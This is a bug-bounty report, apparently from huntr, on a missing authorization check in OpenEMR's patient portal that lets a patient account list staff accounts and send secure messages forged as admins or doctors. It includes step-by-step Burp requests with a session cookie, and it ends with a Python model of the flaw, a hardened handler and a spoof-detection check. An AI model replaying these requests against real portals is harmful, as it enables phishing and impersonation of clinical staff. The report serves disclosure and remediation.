huntr | drew-sec | 62DE71BD-333D-4593-91A5-534EF7F0C435
History: Feb 27, 2023 - 3:47 a.m.

Missing Authorization Check Allows Impersonated Secure Messages

2023-02-27 03:47:07
drew-sec
www.huntr.dev
authorization check
impersonation
secure messages
social engineering
phishing
portal security

EPSS

0.008

Percentile

81.7%

Description

Due to the lack of an authorization check when sending secure messages, an attacker with access to a low-level patient account in the portal can impersonate other users when sending secure messages. This allows a malicious actor to impersonate high-level users (administrators/doctors) when sending secure messages, which can lead to legitimate-looking social engineering and phishing attacks.

Proof of Concept

Step 1. Log in to the patient portal using a low-level patient account.
Step 2. Using a tool such as BurpSuite, capture the following request and view its response. The response contains account information about privileged users and their accounts.

# Request
POST /openemr/portal/messaging/secure_chat.php?action=authusers HTTP/1.1
Host: demo.openemr.io
(...snippet...)
Te: trailers
Connection: close

# Response
HTTP/1.1 200 OK
Server: nginx/1.21.1
Date: Mon, 27 Feb 2023 02:47:10 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 367
Connection: close
X-Powered-By: PHP/8.0.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache

[{"recip_id":"admin","dash":"1","username":"Billy Smith"},{"recip_id":"accountant","dash":"0","username":"Ernie Stent"},{"recip_id":"clinician","dash":"1","username":"Fred Stone"},{"recip_id":"physician","dash":"1","username":"Donna Lee"},{"recip_id":"receptionist","dash":"0","username":"Barbara Wallace"},{"recip_id":"zhportal","dash":"0","username":"Fred Jarvis"}]

Step 3. Now go to the ‘My Messages’ section and craft a test message. Send this test message and capture the request using Burp.
Step 4. Replace the recipient_id, recipient_name, sender_id and sender_name parameters with information acquired from step 2. For example, send a message from the admin account to another high-privileged user.

POST /openemr/portal/messaging/handle_note.php HTTP/1.1
Host: demo.openemr.io
Cookie: username=Phil%20Belford; PortalOpenEMR=hsQebSDBqentL5pi-I6T5MVvqPNCGTX4d7pODNoKqhoy5-K%2C
(...snippet...)
Content-Length: 255
Origin: https://demo.openemr.io
Referer: https://demo.openemr.io/openemr/portal/messaging/messages.php
(...snippet...)
Connection: close

title=Test&csrf_token_form=a6d7d772289b2d6083009d0dd9d6aab52da81ca5&noteid=&replyid=&recipient_id=physician&recipient_name=Donna+Lee&sender_id=admin&sender_name=Billy+Smith&task=add&inputBody=%3Cp%3EThis+is+a+test.%3C%2Fp%3E%0D%0A&pid=&submit=messages.php

Step 5. Release this altered request and the victim will receive your impersonated secure message. High-level users will receive this message in the “Secure Messages” section even if they do not usually have access to this feature. (A portal icon will appear in the top right corner of their screen)
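The root cause is that handle_note.php copies sender_id and sender_name straight out of the POST body instead of deriving them from the authenticated portal session. The following Python model is an added example, not OpenEMR's own PHP code: it replays the captured form body from step 4 through a "before" handler that trusts the form fields and a hardened handler that takes the sender from the session, resolves the recipient name server-side, and flags a request whose claimed sender differs from the session user so it can be logged. The Session and SecureMessage types, the staff directory, the patient user id and the CSRF placeholder are constructed for the example.

```python
"""Model of the missing authorization check described in this report.
Added example; the field names, Session type and staff directory are
assumptions, not OpenEMR's real schema."""
from dataclasses import dataclass
from urllib.parse import parse_qs


@dataclass(frozen=True)
class Session:
    """Authenticated portal session (constructed model of the PortalOpenEMR cookie)."""
    user_id: str
    display_name: str


@dataclass(frozen=True)
class SecureMessage:
    sender_id: str
    sender_name: str
    recipient_id: str
    recipient_name: str
    title: str
    body: str


class AuthorizationError(Exception):
    pass


# Constructed staff directory shaped like the authusers JSON in step 2.
STAFF_DIRECTORY = {
    "admin": "Billy Smith",
    "physician": "Donna Lee",
    "clinician": "Fred Stone",
}

# The step 4 body with the real CSRF token replaced by a placeholder.
POC_BODY = (
    "title=Test&csrf_token_form=CSRF_TOKEN_PLACEHOLDER&noteid=&replyid="
    "&recipient_id=physician&recipient_name=Donna+Lee"
    "&sender_id=admin&sender_name=Billy+Smith&task=add"
    "&inputBody=%3Cp%3EThis+is+a+test.%3C%2Fp%3E%0D%0A&pid=&submit=messages.php"
)

# Low-level patient session; the display name comes from the cookie in step 4,
# the user id is a constructed value.
PATIENT_SESSION = Session(user_id="patient_phil", display_name="Phil Belford")


def parse_form(raw_body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into single-valued fields."""
    return {k: v[0] for k, v in parse_qs(raw_body, keep_blank_values=True).items()}


POC_FORM = parse_form(POC_BODY)


def vulnerable_add_message(session: Session, form: dict) -> SecureMessage:
    """Before: sender identity is copied from client-controlled form fields,
    so the session user is never consulted."""
    return SecureMessage(
        sender_id=form["sender_id"],
        sender_name=form["sender_name"],
        recipient_id=form["recipient_id"],
        recipient_name=form["recipient_name"],
        title=form["title"],
        body=form["inputBody"],
    )


def hardened_add_message(session: Session, form: dict) -> SecureMessage:
    """After: sender comes from the session, recipient must exist in the
    server-side directory, and sender_*/recipient_name form fields are ignored."""
    recipient_id = form.get("recipient_id", "")
    if recipient_id not in STAFF_DIRECTORY:
        raise AuthorizationError(f"unknown recipient {recipient_id!r}")
    return SecureMessage(
        sender_id=session.user_id,
        sender_name=session.display_name,
        recipient_id=recipient_id,
        recipient_name=STAFF_DIRECTORY[recipient_id],  # looked up, not trusted
        title=form.get("title", ""),
        body=form.get("inputBody", ""),
    )


def is_spoof_attempt(session: Session, form: dict) -> bool:
    """Detection hook: the form claims a sender other than the session user.
    Worth logging even after the fix, since the field is then simply ignored."""
    claimed = form.get("sender_id")
    return claimed is not None and claimed != session.user_id


if __name__ == "__main__":
    print("before:", vulnerable_add_message(PATIENT_SESSION, POC_FORM))
    print("after: ", hardened_add_message(PATIENT_SESSION, POC_FORM))
    print("spoof attempt flagged:", is_spoof_attempt(PATIENT_SESSION, POC_FORM))
```

Run as a script, the "before" message is stamped as coming from admin/Billy Smith while the "after" message carries the patient's own identity regardless of what the form claims; the same request also trips the spoof check, which is the signal to alert on in portal access logs.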

